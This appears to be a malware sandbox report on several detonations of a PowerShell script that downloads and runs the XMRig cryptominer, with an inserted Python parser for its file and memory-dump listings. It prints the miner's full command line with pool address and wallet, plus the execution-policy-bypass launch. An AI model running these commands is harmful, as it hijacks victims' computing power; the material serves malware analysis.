memory/4592-76-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-77-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-78-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-79-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-80-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-81-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-82-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-83-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-84-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-85-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-86-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-87-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-88-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-89-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-90-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-91-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-92-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-93-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-94-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-95-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-96-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-97-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-98-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-99-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-100-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-101-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-102-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-103-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-104-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-105-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-106-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-107-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-108-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-109-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-110-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-111-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-112-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-113-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-114-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-115-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-116-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-117-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-118-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-119-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:19
Platform
win10-20240404-en
Max time kernel
1788s
Max time network
1792s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(64 matches, all without description, indicator, process or target)
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5116 wrote to memory of 3824 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 5116 wrote to memory of 3824 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.116.69.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
memory/5116-3-0x00007FFE943D3000-0x00007FFE943D4000-memory.dmp
memory/5116-5-0x00000182A8680000-0x00000182A86A2000-memory.dmp
memory/5116-6-0x00007FFE943D0000-0x00007FFE94DBC000-memory.dmp
memory/5116-9-0x00000182A8830000-0x00000182A88A6000-memory.dmp
memory/5116-10-0x00007FFE943D0000-0x00007FFE94DBC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eyxeze3f.z25.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/5116-25-0x00007FFE943D0000-0x00007FFE94DBC000-memory.dmp
memory/5116-48-0x00000182A89B0000-0x00000182A89C2000-memory.dmp
memory/5116-61-0x00000182A8810000-0x00000182A881A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3824-90-0x00000189904E0000-0x0000018990500000-memory.dmp
memory/3824-91-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/5116-92-0x00007FFE943D0000-0x00007FFE94DBC000-memory.dmp
memory/5116-94-0x00007FFE943D3000-0x00007FFE943D4000-memory.dmp
memory/3824-93-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/5116-95-0x00007FFE943D0000-0x00007FFE94DBC000-memory.dmp
memory/3824-96-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-97-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-98-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-99-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-100-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-101-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-102-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-103-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-104-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-105-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-106-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-107-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-108-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-109-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-110-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-111-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-112-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-113-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-114-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-115-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-116-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-117-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-118-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-119-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-120-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-121-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-122-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-123-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-124-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-125-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-126-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-127-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-128-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-129-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-130-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-131-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-132-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-133-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-134-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-135-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-136-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-137-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-138-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-139-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-140-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-141-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-142-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-143-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-144-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-145-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-146-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-147-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-148-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-149-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-150-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-151-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-152-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-153-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-154-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-155-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-156-0x00007FF733130000-0x00007FF733D63000-memory.dmp
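An added example, not part of the report: a parser for the flattened Files listing (constructed from lines of this run and one line of the behavioral2 run above), which separates dropped files from memory dumps, marks `__PSScriptPolicyTest_*.ps1` as PowerShell's own AppLocker/WDAC probe rather than attacker content, lets you confirm a suspected file content against the recorded hashes (the probe file in this run hashes as the single character `1`), and compares the mapped size of the xmrig.exe image region across runs: it stays at 0xC33000 bytes while ASLR moves the base, which is a cheap cross-check on the identical SHA256.

```python
from __future__ import annotations
import hashlib
import re
from collections import Counter
from dataclasses import dataclass, field

# Constructed sample: lines copied from this run's Files section (PID 5116 =
# powershell.exe, PID 3824 = xmrig.exe) and one xmrig image dump from the
# behavioral2 run (PID 4592) for the cross-run comparison.
RUN10_FILES = r"""
memory/5116-6-0x00007FFE943D0000-0x00007FFE94DBC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eyxeze3f.z25.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
memory/3824-90-0x00000189904E0000-0x0000018990500000-memory.dmp
memory/3824-91-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-93-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-156-0x00007FF733130000-0x00007FF733D63000-memory.dmp
"""
RUN2_FILES = r"""
memory/4592-53-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
"""

@dataclass
class MemoryDump:
    pid: int
    seq: int
    start: int
    end: int
    @property
    def size(self) -> int:
        return self.end - self.start

@dataclass
class DroppedFile:
    path: str
    hashes: dict[str, str] = field(default_factory=dict)
    @property
    def name(self) -> str:
        return self.path.rsplit("\\", 1)[-1]

_MEM = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
_HASH = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-f]+)\s*\|$")

def parse_files_section(text: str) -> tuple[list[DroppedFile], list[MemoryDump]]:
    """A path line opens a dropped-file record; the '| ALG | hex |' rows after it
    belong to that record; memory/... lines are dumps and close any open record."""
    dropped, dumps, current = [], [], None
    for line in (l.strip() for l in text.splitlines()):
        if not line:
            continue
        if m := _MEM.match(line):
            dumps.append(MemoryDump(int(m[1]), int(m[2]), int(m[3], 16), int(m[4], 16)))
            current = None
        elif (h := _HASH.match(line)) and current is not None:
            current.hashes[h[1]] = h[2]
        else:
            current = DroppedFile(path=line)
            dropped.append(current)
    return dropped, dumps

def classify(f: DroppedFile) -> str:
    # PowerShell writes __PSScriptPolicyTest_<random>.ps1 itself to probe AppLocker/WDAC
    # script enforcement; it is a host artifact, not something the sample dropped.
    if f.name.startswith("__PSScriptPolicyTest_") and f.name.endswith(".ps1"):
        return "powershell-policy-probe"
    return "dropped-file"

_ALGOS = {"MD5": hashlib.md5, "SHA1": hashlib.sha1, "SHA256": hashlib.sha256, "SHA512": hashlib.sha512}

def hashes_match_content(f: DroppedFile, content: bytes) -> bool:
    """True if every recorded digest of f equals the digest of content."""
    recorded = {k: v for k, v in f.hashes.items() if k in _ALGOS}
    return bool(recorded) and all(_ALGOS[k](content).hexdigest() == v for k, v in recorded.items())

def region_counts(dumps: list[MemoryDump]) -> Counter:
    """How many times each (pid, start, end) region was dumped."""
    return Counter((d.pid, d.start, d.end) for d in dumps)

def largest_region(dumps: list[MemoryDump]) -> dict[int, MemoryDump]:
    """Per PID, the largest dumped region; for a native EXE this is normally the main image."""
    best: dict[int, MemoryDump] = {}
    for d in dumps:
        if d.pid not in best or d.size > best[d.pid].size:
            best[d.pid] = d
    return best

def same_image_size(a: MemoryDump, b: MemoryDump) -> bool:
    """ASLR changes the base between runs; an unchanged mapped size is consistent with the same binary."""
    return a.size == b.size

if __name__ == "__main__":
    files, dumps = parse_files_section(RUN10_FILES)
    for f in files:
        print(classify(f), f.name, f.hashes.get("SHA256"))
    for pid, d in largest_region(dumps).items():
        print(f"pid {pid}: image region 0x{d.start:X}-0x{d.end:X} size 0x{d.size:X}")
```

Only the xmrig.exe record is worth an IOC; the policy-probe file has a different hash in every run because its name and, here, its content vary, so blocking on it would only generate noise.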
Analysis: behavioral23
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:28
Platform
win10v2004-20240508-en
Max time kernel
1795s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(64 matches, all without description, indicator, process or target)
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3412 wrote to memory of 4940 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3412 wrote to memory of 4940 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4360,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=3820 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4108,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=3244 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.201.50.20.in-addr.arpa | udp |
Files
memory/3412-0-0x00007FFCBC053000-0x00007FFCBC055000-memory.dmp
memory/3412-1-0x0000024E6D1D0000-0x0000024E6D1F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r1eawmjt.ol4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3412-11-0x00007FFCBC050000-0x00007FFCBCB11000-memory.dmp
memory/3412-12-0x00007FFCBC050000-0x00007FFCBCB11000-memory.dmp
memory/3412-14-0x00007FFCBC050000-0x00007FFCBCB11000-memory.dmp
memory/3412-15-0x0000024E6D360000-0x0000024E6D372000-memory.dmp
memory/3412-16-0x0000024E6D350000-0x0000024E6D35A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4940-47-0x000002AA8C530000-0x000002AA8C550000-memory.dmp
memory/4940-48-0x000002AA8C580000-0x000002AA8C5A0000-memory.dmp
memory/4940-49-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-51-0x000002AA8DD80000-0x000002AA8DDA0000-memory.dmp
memory/4940-52-0x000002AA8DD60000-0x000002AA8DD80000-memory.dmp
memory/3412-50-0x00007FFCBC053000-0x00007FFCBC055000-memory.dmp
memory/4940-53-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/3412-54-0x00007FFCBC050000-0x00007FFCBCB11000-memory.dmp
memory/4940-55-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/3412-56-0x00007FFCBC050000-0x00007FFCBCB11000-memory.dmp
memory/4940-57-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-58-0x000002AA8DD80000-0x000002AA8DDA0000-memory.dmp
memory/4940-59-0x000002AA8DD60000-0x000002AA8DD80000-memory.dmp
memory/4940-60-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-61-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-62-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-63-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-64-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-65-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-66-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-67-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-68-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-69-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-70-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-71-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-72-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-73-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-74-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-75-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-76-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-77-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-78-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-79-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-80-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-81-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-82-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-83-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-84-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-85-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-86-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-87-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-88-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-89-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-90-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-91-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-92-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-93-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-94-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-95-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-96-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-97-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-98-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-99-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-100-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-101-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
